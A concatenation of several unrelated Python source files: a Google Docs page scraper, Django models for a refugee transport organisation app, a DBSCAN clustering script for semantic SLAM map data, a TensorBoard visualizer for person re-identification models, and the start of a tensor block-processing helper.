self._scannedDomains.add('https://drive.google.com/open')
if not scannedDomains:
scannedDomains = []
if not tlds:
tlds = []
# Build the filtering structures for checking outgoing links.
for tld in tlds:
self._tld.add(tld)
if isinstance(scannedDomains, (set, list)):
for url in scannedDomains:
self.installBaseUrl(url)
else:
self.installBaseUrl(scannedDomains)
# File mapping LUT
self.fMap = {}
def installBaseUrl(self, url):
# print("Inserting ", url)
netloc = urllib.parse.urlsplit(url.lower()).netloc
if not netloc:
raise ValueError("One of the scanned domains collapsed down to an empty string: '%s'!" % url)
# Generate the possible wordpress netloc values.
if 'wordpress.com' in netloc:
subdomain, mainDomain, tld = netloc.rsplit(".")[-3:]
self._scannedDomains.add("www.{sub}.{main}.{tld}".format(sub=subdomain, main=mainDomain, tld=tld))
self._scannedDomains.add("{sub}.{main}.{tld}".format(sub=subdomain, main=mainDomain, tld=tld))
self._scannedDomains.add("www.{sub}.files.{main}.{tld}".format(sub=subdomain, main=mainDomain, tld=tld))
self._scannedDomains.add("{sub}.files.{main}.{tld}".format(sub=subdomain, main=mainDomain, tld=tld))
# Blogspot is annoying and sometimes a single site is spread over several tlds. *.com, *.sg, etc...
if 'blogspot.' in netloc:
subdomain, mainDomain, tld = netloc.rsplit(".")[-3:]
self._tld.add(tld)
for tld in self._tld:
self._scannedDomains.add("www.{sub}.{main}.{tld}".format(sub=subdomain, main=mainDomain, tld=tld))
self._scannedDomains.add("{sub}.{main}.{tld}".format(sub=subdomain, main=mainDomain, tld=tld))
if 'sites.google.com/site/' in url:
self._scannedDomains.add(url)
elif 'google.' in netloc:
self.log.info("Skipping URL: '%s'", url)
else:
base, tld = netloc.rsplit(".", 1)
self._tld.add(tld)
for tld in self._tld:
self._scannedDomains.add("{main}.{tld}".format(main=base, tld=tld))
# print(self._scannedDomains)
########################################################################################################################
#
# ###### ####### ####### ###### ## ######## ######## ####### ###### ######
# ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ##
# ## ## ## ## ## ## ## ## ## ## ## ## ## ##
# ## #### ## ## ## ## ## #### ## ###### ## ## ## ## ## ######
# ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ##
# ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ##
# ###### ####### ####### ###### ######## ######## ######## ####### ###### ######
#
########################################################################################################################
def processGdocResources(self, resources):
# Expected format of tuples in ret:
# fName, mimeType, content, fHash
ret = []
for fName, mimeType, content in resources:
m = hashlib.md5()
m.update(content)
fHash = m.hexdigest()
pseudoUrl = "gdoc-"+fHash
self.fMap[fName] = fHash
fName = os.path.split(fName)[-1]
self.log.info("Resource = '%s', '%s', '%s'", fName, mimeType, pseudoUrl)
if mimeType in ["image/gif", "image/jpeg", "image/pjpeg", "image/png", "image/svg+xml", "image/vnd.djvu"]:
self.log.info("Processing resource '%s' as an image file. (mimetype: %s)", fName, mimeType)
ret.append((fName, mimeType, content, pseudoUrl))
elif mimeType in ["application/octet-stream"]:
self.log.info("Processing '%s' as an binary file.", fName)
ret.append((fName, mimeType, content, pseudoUrl))
else:
self.log.warn("Unknown MIME Type? '%s', FileName: '%s'", mimeType, fName)
if len(resources) == 0:
self.log.info("File had no resource content!")
return ret
def cleanGdocPage(self, soup, url):
# doc = readability.readability.Document(str(soup))
title = self.extractTitle(soup, url)
for span in soup.find_all("span"):
span.unwrap()
for style in soup.find_all('style'):
style.decompose()
for tag in soup.find_all(attrs = {'class' : True}):
del tag['class']
return title, soup
# Hook so plugins can modify the internal URLs as part of the relinking process
def preprocessGdocReaderUrl(self, inUrl):
if inUrl.lower().endswith("/preview"):
inUrl = inUrl[:-len("/preview")]
return inUrl
def convertToGdocReaderImage(self, srcUrl):
itemHash = None
for rscEnd in self.fMap:
if srcUrl.endswith(rscEnd):
itemHash = self.fMap[rscEnd]
# if srcUrl in self.fMap:
# url = self.fMap[srcUrl]
# elif any([fUrl in url for fUrl in self.fMap]):
# print('wat')
# raise ValueError("Unknown image URL! = '%s'" % url)
if not itemHash:
raise ValueError("Unknown image URL! = '%s' (hash '%s')" % (srcUrl, itemHash))
url = '/books/render?mdsum=%s' % urllib.parse.quote(itemHash)
return url
def processGdocPage(self, url, content):
dummy_fName, content = content
soup = WebRequest.as_soup(content)
urlFuncs.canonizeUrls(soup, url)
pgTitle, soup = self.cleanGdocPage(soup, url)
plainLinks = self.extractLinks(soup, url)
self.log.info("Page title = '%s'", pgTitle)
soup = self.relink(soup, imRelink=self.convertToGdocReaderImage)
url = self.preprocessGdocReaderUrl(url)
url = urlFuncs.trimGDocUrl(url)
# Since the content we're extracting will be embedded into another page, we want to
# strip out the <body> and <html> tags. `unwrap()` replaces the soup with the contents of the
# tag it's called on. We end up with just the contents of the <body> tag.
soup.body.unwrap()
pgBody = soup.prettify()
# No image links, since they're served as resource files in a google doc
imageLinks = []
return plainLinks, imageLinks, pgTitle, pgBody
# self.updateDbEntry(url=url, title=pgTitle, contents=pgBody, mimetype='text/html', dlstate=2)
def retreiveGoogleDoc(self, url):
self.log.info("Should fetch google doc at '%s'", url)
doc = gdp.GDocExtractor(url)
attempts = 0
mainPage = None
while 1:
attempts += 1
try:
mainPage, resources = doc.extract()
except TypeError:
self.log.critical('Extracting item failed!')
for line in traceback.format_exc().strip().split("\n"):
self.log.critical(line.strip())
raise urlFuncs.CannotAccessGDocException("Cannot access google doc! Is it protected?")
if mainPage:
break
if attempts > 3:
raise TextScrape.SiteArchiver.DownloadException
resources = self.processGdocResources(resources)
return self.processGdocPage(url, mainPage) + (resources, )
# Process a Google-Doc resource page.
# This call does a set of operations to permute and clean a google doc page.
def extractContent(self):
plainLinks, imageLinks, pgTitle, pgBody, resources = self.retreiveGoogleDoc(self.pageUrl)
ret = {}
ret['plainLinks'] = plainLinks
ret['rsrcLinks'] = imageLinks
ret['title'] = pgTitle
ret['contents'] = pgBody
ret['resources'] = resources
return ret
def test():
print("Test mode!")
import WebRequest
import logSetup
logSetup.initLogging()
wg = WebRequest.WebGetRobust()
# content = wg.getpage('http://www.arstechnica.com')
scraper = GdocPageProcessor('https://docs.google.com/document/d/1atXMtCutHRpcHwSRS5UyMAC58_gQjMPR2dDVn1LCD3E', 'Main.Test', 'testinating')
print(scraper)
extr, rsc = scraper.extractContent()
print('Plain Links:')
for link in extr['plainLinks']:
print(link)
print()
print()
print('Resource files:')
# for link in extr['rsrcLinks']:
# print(link)
for fName, mimeType, content, pseudoUrl in rsc:
print(fName, mimeType, pseudoUrl)
# print(extr['contents'])
if __name__ == "__main__":
test()
|
<reponame>shubhamdipt/refugee-management<filename>organization/models.py
from django.conf import settings
from django.core.validators import MaxValueValidator, MinValueValidator
from django.db import models
from django.utils import timezone
from django.utils.translation import gettext_lazy as _
from locations.models import City, Route
from refugee_management.models import CreateUpdateModel
TIMEZONE = settings.TIME_ZONE
class Organization(models.Model):
name = models.CharField(_("Name"), max_length=255, unique=True)
address = models.CharField(_("Address"), max_length=255, null=True, blank=True)
class Meta:
verbose_name = _("Organization")
verbose_name_plural = _("Organizations")
def __str__(self):
return self.name
class Helper(models.Model):
ADMIN = 1
HELPER = 2
ACCOUNT_TYPES = ((ADMIN, _("Admin")), (HELPER, _("Helper")))
organization = models.ForeignKey(
Organization,
verbose_name=_("Organization"),
on_delete=models.SET_NULL,
null=True,
blank=True,
)
account_user = models.OneToOneField(
settings.AUTH_USER_MODEL,
on_delete=models.CASCADE,
)
account_type = models.IntegerField(_("Account type"), choices=ACCOUNT_TYPES)
verified = models.BooleanField(_("Verified"), default=False)
class Meta:
verbose_name = _("Helper")
verbose_name_plural = _("Helpers")
def __str__(self):
first_name = self.account_user.first_name
last_name = self.account_user.last_name
email = self.account_user.email
return f"{first_name if first_name else ''} {last_name if last_name else ''} - {email}"
def as_dict(self):
return {
"id": self.id,
"organization": self.organization.name,
"first_name": self.account_user.first_name,
"last_name": self.account_user.last_name,
"email": self.account_user.email,
"phone": self.account_user.phone,
"account_type": self.get_account_type_display(),
"verified": self.verified,
}
class OrganizationTransferRules(CreateUpdateModel):
headline = models.CharField(_("Headline"), unique=True, max_length=63)
rules = models.TextField(_("Rules"))
organization = models.ForeignKey(
Organization,
verbose_name=_("Organization"),
on_delete=models.SET_NULL,
null=True,
blank=True,
)
class Meta:
verbose_name = _("Organization Transfer Rules")
verbose_name_plural = _("Organizations Transfer Rules")
def __str__(self):
return f"{self.headline}: {self.organization.name}"
class OrganizationPickUpPoint(models.Model):
organization = models.ForeignKey(
Organization,
verbose_name=_("Organization"),
on_delete=models.SET_NULL,
null=True,
blank=True,
)
city = models.ForeignKey(City, verbose_name=_("City"), on_delete=models.CASCADE)
address = models.CharField(_("Address"), max_length=255)
class Meta:
verbose_name = _("Organization Pick Up point")
verbose_name_plural = _("Organization Pick Up points")
unique_together = ("city", "address")
def __str__(self):
return f"{self.city}: {self.address}"
class OrganizationRoute(models.Model):
"""This model connects an organization with possible routes for search purposes."""
route = models.ForeignKey(
Route,
verbose_name=_("Route"),
on_delete=models.CASCADE,
)
organization = models.ForeignKey(
Organization,
verbose_name=_("Organization"),
on_delete=models.CASCADE,
)
class Meta:
verbose_name = _("Organization Route")
verbose_name_plural = _("Organization Routes")
def __str__(self):
return f"Route: {self.route.id}, Organization: {self.organization}"
class Transfer(CreateUpdateModel):
CAR = 1
BUS = 2
VEHICLE_CHOICES = ((CAR, _("Car")), (BUS, _("Bus")))
organization_route = models.ForeignKey(
OrganizationRoute,
verbose_name=_("Organization route"),
on_delete=models.CASCADE,
)
helper = models.ForeignKey(
Helper,
verbose_name=_("Helper"),
on_delete=models.SET_NULL,
null=True,
blank=True,
related_name="primary_helper",
)
secondary_helper = models.ForeignKey(
Helper,
verbose_name=_("Secondary Helper"),
on_delete=models.SET_NULL,
null=True,
blank=True,
related_name="secondary_helper",
)
start_time = models.DateTimeField(_("Start time"), null=True, blank=True)
refugee_seats = models.IntegerField(
_("Refugee seats"),
default=1,
validators=[MinValueValidator(1), MaxValueValidator(1000)],
)
helper_seats = models.IntegerField(
_("Helper seats"),
default=0,
validators=[MinValueValidator(0), MaxValueValidator(1000)],
)
driver_seats = models.IntegerField(
_("Driver seats"),
default=1,
validators=[MinValueValidator(1), MaxValueValidator(1000)],
)
vehicle = models.IntegerField(_("Vehicle type"), choices=VEHICLE_CHOICES, null=True, blank=True)
vehicle_registration_number = models.CharField(
_("Vehicle registration number"), max_length=60, null=True, blank=True
)
food = models.BooleanField(_("Food "), default=False)
drinks = models.BooleanField(_("Drinks"), default=False)
blanket = models.BooleanField(_("Blanket"), default=False)
healthcare = models.BooleanField(_("Healthcare personnel"), default=False)
translators = models.CharField(_("Translators"), max_length=255, null=True, blank=True)
description = models.TextField(_("Additional remarks"), null=True, blank=True)
rules = models.ForeignKey(
OrganizationTransferRules,
verbose_name=_("Rules"),
on_delete=models.SET_NULL,
null=True,
blank=True,
)
active = models.BooleanField(_("Active"), default=True)
class Meta:
verbose_name = _("Transfer")
verbose_name_plural = _("Transfers")
def __str__(self):
return f"{self.id}"
@property
def stopovers(self):
return TransferRouteDetails.objects.filter(transfer=self).select_related("city").order_by("departure_time")
@property
def stopovers_text(self):
return " -> ".join([i.city.name for i in self.stopovers])
@property
def route_text(self):
cities = [str(i.city) for i in self.stopovers]
return f"{cities[0]} -> {cities[-1]}"
def as_dict(self, helper_view=False, refugee_view=False):
dict_obj = {
"id": self.pk,
"refugee_seats": self.refugee_seats,
"food": self.food,
"drinks": self.drinks,
"blanket": self.blanket,
"healthcare": self.healthcare,
"translators": self.translators,
"route": self.stopovers_text,
"start_time": timezone.localtime(self.start_time).strftime("%d/%m/%Y %H:%M") if self.start_time else None,
"rules": self.rules.rules if self.rules else None,
}
hidden_dict = {}
if helper_view:
hidden_dict = {
"organization": self.organization_route.organization.name,
"helper": self.helper.account_user.email if self.helper else None,
"secondary_helper": self.secondary_helper.email if self.secondary_helper else None,
"helper_seats": self.helper_seats,
"driver_seats": self.driver_seats,
"vehicle": self.get_vehicle_display() if self.vehicle else None,
"vehicle_registration_number": self.vehicle_registration_number,
"description": self.description,
}
dict_obj = {**dict_obj, **hidden_dict}
if refugee_view:
hidden_fields = ["id", "helper_seats", "driver_seats", "description"]
dict_obj = {k: v for k, v in dict_obj.items() if k not in hidden_fields}
return dict_obj
class TransferRouteDetails(models.Model):
transfer = models.ForeignKey(
Transfer,
verbose_name=_("Transfer"),
on_delete=models.SET_NULL,
null=True,
blank=True,
)
city = models.ForeignKey(
City,
verbose_name=_("City"),
on_delete=models.SET_NULL,
null=True,
blank=True,
related_name="org_transfer_city",
)
address = models.CharField(_("Address"), max_length=255, null=True, blank=True)
departure_time = models.DateTimeField(_("Departure time"))
class Meta:
verbose_name = _("Transfer Route Details")
verbose_name_plural = _("Transfer Route Details")
def __str__(self):
return f"{self.transfer}: {self.city} at {self.departure_time}"
def as_dict(self):
return {
"id": self.id,
"city": self.city.name,
"address": self.address,
"departure_time": timezone.localtime(self.departure_time).strftime("%d/%m/%Y %H:%M")
if self.departure_time
else None,
}
|
<reponame>germal/Semantic_SLAM-1<gh_stars>100-1000
# coding: utf-8
import numpy as np
import matplotlib.pyplot as plt
import sklearn.datasets as ds
import matplotlib.colors
from sklearn.cluster import DBSCAN
from sklearn.preprocessing import StandardScaler
def expand(a, b):
d = (b - a) * 0.1
return a-d, b+d
if __name__ == "__main__":
f = open("../../semantic-SLAM/src/semantic_map.txt", "r")
data = []
for line in f.readlines():
line = line.strip('\n')
line = line.split(' ')
line.remove('')
if " " in line:
line.remove(' ')
data.append(line)
f.close()
print(np.shape(data))
data = np.array(data)
data, c = data[:,0::2], data[:,3]
Data = []
print(np.shape(data))
for i in range(np.shape(data)[0]):
for j in range(np.shape(data)[1]):
data[i,j] = float(data[i,j])
print(np.shape(data))
for i in range(np.size(c)):
if c[i] == '200':
Data.append(data[i])
Data = np.array(Data)
print(np.shape(Data))
Data = StandardScaler().fit_transform(Data)
data = Data *1000
print(np.shape(Data))
print('Done.')
# 数据1的参数:(epsilon, min_sample)
params = ((200, 50), (200, 100), (225, 150), (130, 70), (100, 100), (100, 150))
# 数据2
# t = np.arange(0, 2*np.pi, 0.1)
# data1 = np.vstack((np.cos(t), np.sin(t))).T
# data2 = np.vstack((2*np.cos(t), 2*np.sin(t))).T
# data3 = np.vstack((3*np.cos(t), 3*np.sin(t))).T
# data = np.vstack((data1, data2, data3))
# # # 数据2的参数:(epsilon, min_sample)
# params = ((0.5, 3), (0.5, 5), (0.5, 10), (1., 3), (1., 10), (1., 20))
matplotlib.rcParams['font.sans-serif'] = [u'Droid Sans Fallback']
matplotlib.rcParams['axes.unicode_minus'] = False
plt.figure(figsize=(24, 16), facecolor='w')
plt.suptitle(u'DBSCAN clustering', fontsize=20)
i = 2
eps, min_samples = params[i]
model = DBSCAN(eps=eps, min_samples=min_samples)
model.fit(data)
y_hat = model.labels_
core_indices = np.zeros_like(y_hat, dtype=bool)
core_indices[model.core_sample_indices_] = True
y_unique = np.unique(y_hat)
n_clusters = y_unique.size - (1 if -1 in y_hat else 0)## y_hat=-1为聚类后的噪声类
print(y_unique, 'cluster number:', n_clusters)
#plt.subplot(2, 3, i+1)
clrs = plt.cm.Spectral(np.linspace(0, 0.8, y_unique.size))##指定聚类后每类的颜色
print clrs
for k, clr in zip(y_unique, clrs):
cur = (y_hat == k)
if k == -1:
plt.scatter(data[cur, 0], data[cur, 1], s=20, c='k')
continue
plt.scatter(data[cur, 0], data[cur, 1], s=30, c=clr, edgecolors='k')
#plt.scatter(data[cur & core_indices][:, 0], data[cur & core_indices][:, 1], s=60, c=clr, marker='o', edgecolors='k')
x1_min, x2_min = np.min(data, axis=0) ## 两列的最小值
x1_max, x2_max = np.max(data, axis=0)## 两列的最大值
x1_min, x1_max = expand(x1_min, x1_max)
x2_min, x2_max = expand(x2_min, x2_max)
plt.xlim((x1_min, x1_max))
plt.ylim((x2_min, x2_max))
plt.grid(True)
plt.title(ur'$\epsilon$ = %.1f m = %d, cluster number:%d' % (eps, min_samples, n_clusters), fontsize=16)
plt.tight_layout()
plt.subplots_adjust(top=0.9)
plt.show()
|
from torch.utils.tensorboard import SummaryWriter
from torchvision import transforms
from datasets.dataset_processors import ExtendedDataset
from models.model import ResNet50
from models.siamese import MssNet
from base import BaseExecutor
from utils.utilities import type_error_msg, value_error_msg, timer, load_model
from configparser import ConfigParser
from os.path import join
import matplotlib.pyplot as plt
from scipy.io import loadmat
from collections import Counter, OrderedDict, Iterable
from shutil import rmtree
from math import ceil
import torch
import numpy as np
class Visualizer(BaseExecutor):
"""A general visualizer.
Args:
config (ConfigParser): The ConfigParser which reads setting files.
name (str): A name defined in base.py.
model (str): A model defined in base.py.
pretrain (bool): Use saved pretrained models or not.
epoch (int): The epoch of the saved trained model for visualizing.
split (str): A split protocol defined in base.py.
scene (str): A scene defined in base.py.
query_list (list): A list of query indices.
length (int): The length of ranking list.
Attributes:
writer (SummaryWriter): The writer writes out events and summaries to the event file.
train_path (str): Path to save loss/error in every epoch.
test_path (str): Path to the dictionary of gallery and query info.
evaluation_path (str): Path to the dictionary of evaluation indicators and rank lists.
"""
DEFAULT_LIST_LENGTH = 10
def __init__(self, config, name, model, pretrain, epoch, split, scene, query_list: list, length: int):
if not isinstance(name, Visualizer.Name):
if isinstance(name, str):
if not name.islower():
name = name.lower()
if name not in Visualizer.NAME_LIST:
raise ValueError(value_error_msg('name', name, Visualizer.NAME_LIST))
name = Visualizer.Name(name)
else:
raise TypeError(type_error_msg('name', name, [Visualizer.Name, str]))
if not isinstance(model, Visualizer.Model):
if isinstance(model, str):
if not model.islower():
model = model.lower()
if model not in Visualizer.MODEL_LIST:
raise ValueError(value_error_msg('model', model, Visualizer.MODEL_LIST))
model = Visualizer.Model(model)
else:
raise TypeError(type_error_msg('model', model, [Visualizer.Model, str]))
if not isinstance(epoch, int):
raise TypeError(type_error_msg('epoch', epoch, [int]))
if not epoch >= 0:
raise ValueError(value_error_msg('epoch', epoch, 'epoch >= 0'))
if not isinstance(split, Visualizer.Split):
if isinstance(split, str):
if not split.islower():
split = split.lower()
if split not in Visualizer.SPLIT_LIST:
raise ValueError(value_error_msg('split', split, Visualizer.SPLIT_LIST))
split = Visualizer.Split(split)
else:
raise TypeError(type_error_msg('split', split, [Visualizer.Split, str]))
if not isinstance(scene, Visualizer.Scene):
if isinstance(scene, str):
if not scene.islower():
scene = scene.lower()
if scene not in Visualizer.SCENE_LIST:
raise ValueError(value_error_msg('scene', scene, Visualizer.SCENE_LIST))
scene = Visualizer.Scene(scene)
else:
raise TypeError(type_error_msg('scene', scene, [Visualizer.Scene, str]))
if not isinstance(query_list, Iterable):
raise TypeError(type_error_msg('query_list', query_list, Iterable))
if not isinstance(length, int):
raise TypeError(type_error_msg('length', length, [int]))
if not length > 0:
raise ValueError(value_error_msg('length', length, 'length > 0',
Visualizer.DEFAULT_LIST_LENGTH))
self.config = config
self.name = name
self.model = model
self.train_class = config.getint(self.name.value, 'train_class')
# initialize model
model_name = self.model.value
if self.model == Visualizer.Model.RESNET50:
self.model = ResNet50(self.config, self.train_class, False)
elif self.model == Visualizer.Model.MSSNET:
self.model = MssNet(self.config)
else:
raise ValueError(value_error_msg('model', model, [Visualizer.Model.RESNET50]))
# load weights
load_model(self.model, self.config[self.name.value]['model_format'] % (model_name, epoch))
self.split = split
self.scene = scene
self.query_list = query_list
self.length = length
self.tensorboard_dir = self.config[self.name.value]['tensorboard_dir']
# WARNING: the log files won' t be saved
rmtree(self.tensorboard_dir, ignore_errors=True)
self.writer = SummaryWriter(join(self.tensorboard_dir, self.name.value))
# dataset loading
self.dataset_type = ['gallery', 'query']
if self.scene == Visualizer.Scene.MULTI_SHOT:
self.dataset_type.append('multi_query')
self.dataset = {}
for item in self.dataset_type:
self.dataset[item] = ExtendedDataset(self.name.value,
join(self.config[self.name.value]['dataset_dir'], item))
self.suffix = 'pretrain' if pretrain else 'no_pretrain'
self.train_path = self.config[self.name.value]['train_path'] % self.suffix
self.test_path = self.config[self.name.value]['test_path'] % self.scene.value
self.evaluation_path = self.config[self.name.value]['evaluation_path'] % self.scene.value
def draw_projection(self):
"""
Reads: A mat file of saved gallery and query info.
Processes: Draws images' embedding to illustrate clustering.
Writes: Log files.
"""
class_dict = OrderedDict(Counter(self.dataset['gallery'].ids))
# {class1: num1, class2: num2, ...}(dict) <-
# "the dictionary made up of the class and the corresponding indices num"
class_num = tuple(class_dict.values())
# (num1, num2, ...)(tuple) <- "the corresponding indices num of each class"
class_index_range = np.cumsum(np.asarray((0,) + class_num)).tolist()
# [0, num1, num1+num2, ...](list) <- "the starting and ending indices of each class, like ticks"
chosen_index = []
for i in class_index_range[2: 32]: # skip id -1(stands for junk image) and id 0(stands for distractor)
chosen_index.extend(list(range(i, i + 3)))
images = self.dataset['gallery'][chosen_index]
labels = torch.as_tensor(self.dataset['gallery'].ids)[chosen_index]
features = loadmat(self.test_path)['gallery_feature'][chosen_index]
horizontal_pad = (max(images[0].size) - min(images[0].size)) // 2
tranform_list = [
transforms.Pad((horizontal_pad, 0, horizontal_pad, 0), (255, 255, 255)),
# pad image in 2:1 to 1:1,
# note that using white to pad on the left and the right will cause unwanted occlusion
# when image density is higher,
# one way to cope is convert image to RGBA mode and set A = 100 for padded pixels, (but it is troublesome)
# transforms.CenterCrop(max(images[0].size)),
# this way will create image edged with black(really unbearable for me)
transforms.ToTensor()
]
square_images = [transforms.Compose(tranform_list)(image) for image in images]
self.writer.add_embedding(features, metadata=labels, label_img=torch.stack(square_images))
self.writer.close()
def draw_model(self):
"""
Reads: None.
Processes: Draws model's structure.
Writes: Log files.
"""
one_image = transforms.ToTensor()(self.dataset['query'][0]).unsqueeze(0) # Any input image tensor.
self.writer.add_graph(self.model, one_image)
self.writer.close()
@staticmethod
def heatmap(ax, x):
"""
Reads: None.
Processes: Draws heatmap of one layer.
Writes: Log files.
"""
heatmap_numpy = x.squeeze().sum(dim=0).numpy()
ax.set_xlabel('{}*{}'.format(heatmap_numpy.shape[0], heatmap_numpy.shape[1]), fontsize=8)
return ax.imshow(heatmap_numpy, cmap='viridis')
def draw_heatmap(self, query_list):
"""
Reads: None.
Processes: Draws heatmap of a specific model.
Writes: Log files.
"""
if isinstance(self.model, ResNet50):
length = 6
structure_list = ['original', 'conv1', 'maxpool', 'layer1', 'layer2', 'layer3']
for j, query in enumerate(query_list):
query_img = self.dataset['query'][query]
query_label = self.dataset['query'].ids[query]
fig, ax = plt.subplots(ncols=length, constrained_layout=False)
ax[0].imshow(query_img)
for i, one_ax in enumerate(ax):
one_ax.set_xticks([])
one_ax.set_yticks([])
if i == 0:
one_ax.set_title('query')
else:
one_ax.set_title(structure_list[i])
x = transforms.ToTensor()(query_img).unsqueeze(0)
x = self.model.model.conv1(x) # 1
Visualizer.heatmap(ax[1], x)
x = self.model.model.bn1(x)
x = self.model.model.relu(x)
x = self.model.model.maxpool(x) # 2
Visualizer.heatmap(ax[2], x)
x = self.model.model.layer1(x) # 3
Visualizer.heatmap(ax[3], x)
x = self.model.model.layer2(x) # 4
Visualizer.heatmap(ax[4], x)
x = self.model.model.layer3(x) # 5
heatmap = Visualizer.heatmap(ax[5], x)
fig.colorbar(heatmap, pad=0.15)
fig.suptitle(query_label)
self.writer.add_figure('query_through_model', fig, j)
else:
raise ValueError(value_error_msg('model', self.model, ResNet50))
self.writer.close()
def draw_loss(self):
"""
Reads: A mat file of losses/errors.
Processes: Draws loss curve.
Writes: Log files.
"""
mat_dict = loadmat(self.train_path)
training_loss = mat_dict['training_loss'].reshape(-1)
if self.split == Visualizer.Split.TRAIN_ONLY:
for epoch, loss in enumerate(training_loss):
self.writer.add_scalar('training loss', loss, epoch)
elif self.split == Visualizer.Split.TRAIN_VAL:
validation_loss = mat_dict['validation_loss'].reshape(-1)
for epoch, train_val in enumerate(zip(training_loss, validation_loss)):
self.writer.add_scalars('loss', {
'train': train_val[0],
'val': train_val[1]
}, epoch)
self.writer.close()
def draw_error(self):
"""
Reads: A mat file of losses/errors.
Processes: Draws error curve.
Writes: Log files.
"""
mat_dict = loadmat(self.train_path)
training_error = mat_dict['training_error'].reshape(-1)
if self.split == Visualizer.Split.TRAIN_ONLY:
for epoch, error in enumerate(training_error):
self.writer.add_scalar('training error', error, epoch)
elif self.split == Visualizer.Split.TRAIN_VAL:
validation_error = mat_dict['validation_error'].reshape(-1)
for epoch, train_val in enumerate(zip(training_error, validation_error)):
self.writer.add_scalars('error', {
'train': train_val[0],
'val': train_val[1]
}, epoch)
self.writer.close()
def draw_CMC(self):
"""
Reads: A mat file of evaluation indicators and rank lists.
Processes: Draws Cumulative Match Curve.
Writes: Log files.
"""
CMC = loadmat(self.evaluation_path)['CMC'].reshape(-1)
for index, cmc in enumerate(CMC):
self.writer.add_scalar('CMC', cmc, index)
self.writer.close()
def draw_query_image(self, query_list):
"""
Args:
query_list (list): The list of query indices.
Reads: A mat file of saved gallery and query info.
Processes: Draws query images.
Writes: Log files.
"""
if self.scene == Visualizer.Scene.SINGLE_SHOT:
for j, query in enumerate(query_list):
query_img = self.dataset['query'][query]
query_label = self.dataset['query'].ids[query]
fig, ax = plt.subplots()
ax.imshow(query_img)
ax.set_xticks([])
ax.set_yticks([]) # serve as thin black border
fig.suptitle(query_label)
self.writer.add_figure('query', fig, j)
elif self.scene == Visualizer.Scene.MULTI_SHOT:
multi_index = loadmat(self.test_path)['multi_index'].reshape(-1)[query_list]
for i, indices in enumerate(multi_index):
indices = indices.reshape(-1)
length = indices.shape[0]
sum_row = ceil(float(length) / Visualizer.DEFAULT_LIST_LENGTH)
sum_column = min(Visualizer.DEFAULT_LIST_LENGTH, length)
fig, ax = plt.subplots(sum_row, sum_column, constrained_layout=False, squeeze=False)
for j in range(length):
row = j // Visualizer.DEFAULT_LIST_LENGTH
column = j % Visualizer.DEFAULT_LIST_LENGTH
one_ax = ax[row][column]
one_ax.set_title('%d' % (j + 1))
one_ax.set_xticks([])
one_ax.set_yticks([])
one_ax.imshow(self.dataset['multi_query'][indices[j]])
column = length % sum_column
if column != 0:
for j in range(column, sum_column):
ax[sum_row - 1][j].axis('off') # clear not used axises on the figure
fig.suptitle('%d@cam %d' % (self.dataset['query'].ids[query_list[i]],
self.dataset['query'].cams[query_list[i]]))
self.writer.add_figure('query list', fig, i)
self.writer.close()
def draw_rank_list(self, query_list, length: int = DEFAULT_LIST_LENGTH):
"""
Args:
query_list (list): The list of query indices.
length (int): The length of rank list for every query.
Reads: A mat file of evaluation indicators and rank lists.
Processes: Draws rank list for each query.
Writes: Log files.
"""
evaluation_dict = loadmat(self.evaluation_path)
index_array = evaluation_dict['index'].reshape(-1)
ap_array = evaluation_dict['ap'].reshape(-1)
for i, query in enumerate(query_list):
query_img = self.dataset['query'][query]
query_label = self.dataset['query'].ids[query]
sum_row = ceil(float(length) / (Visualizer.DEFAULT_LIST_LENGTH + 1))
sum_column = min(Visualizer.DEFAULT_LIST_LENGTH + 1, length + 1)
fig, ax = plt.subplots(sum_row, sum_column, constrained_layout=False, squeeze=False)
ax[0][0].set_xticks([])
ax[0][0].set_yticks([])
ax[0][0].imshow(query_img)
ax[0][0].set_title('query')
ax[0][0].set_xlabel(query_label, fontsize=8)
fig.suptitle('query {}(ap={:.2f}%)'.format(query, ap_array[query] * 100))
rank_index = index_array[query].reshape(-1)[:length]
for j, index in enumerate(rank_index):
gallery_img = self.dataset['gallery'][index]
gallery_label = self.dataset['gallery'].ids[index]
row = (j + 1) // (Visualizer.DEFAULT_LIST_LENGTH + 1)
column = (j + 1) % (Visualizer.DEFAULT_LIST_LENGTH + 1)
one_ax = ax[row][column]
one_ax.set_xticks([])
one_ax.set_yticks([])
one_ax.imshow(gallery_img)
if gallery_label == query_label:
color = 'green'
one_ax.set_title('%d' % (j + 1), color=color)
for item in one_ax.spines.values():
item.set_color(color)
one_ax.set_xlabel(gallery_label, fontsize=8, color=color)
else:
color = 'red'
one_ax.set_title('%d' % (j + 1), color=color)
for item in one_ax.spines.values():
item.set_color(color)
one_ax.set_xlabel(gallery_label, fontsize=8, color=color)
column = (length + 1) % sum_column
if column != 0:
for j in range(column, sum_column):
ax[sum_row - 1][j].axis('off')
self.writer.add_figure('rank list', fig, i)
# self.writer.add_figure('rank list({})'.format(self.scene.value), fig, i)
# It is surprising that the tag string param in writer.add_figure can't be any brackets,
# and the brackets are shown as '___'.
self.writer.close()
@timer
def run(self):
"""
Reads: A mat file of evaluation indicators and rank lists and a mat file of training loss.
Processes: Draws pics using matplotlib.pyplot.
Writes: Log files.
"""
Visualizer.run_info(self.__class__.__name__, '{}, {}'.format(self.suffix, self.scene.value))
with torch.no_grad():
self.draw_projection()
self.draw_model()
self.draw_query_image(self.query_list)
self.draw_heatmap(self.query_list)
self.draw_rank_list(self.query_list, self.length)
self.draw_loss()
self.draw_error()
self.draw_CMC()
# os.system('tensorboard --logdir=%s' % self.tensorboard_dir)
|
<gh_stars>1-10
# Copyright 2020 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import torch
def block_process_2d(data, func, block_size=512, overlap=32, intermediate_as_double=False):
""" Applies function to the given 4-dimensional tensor by chucking it in 2 dimensions and processing each chunk
separately.
Input data is split into chuck across last two dimension. If input data is represented as NCHW, chucking will occur
in HW space. Size of chunks and overlap can be modified. Overlap tells how much chunks should overlap.
Overlapping regions will be interpolated linearly/bilinearly between chunks.
Note:
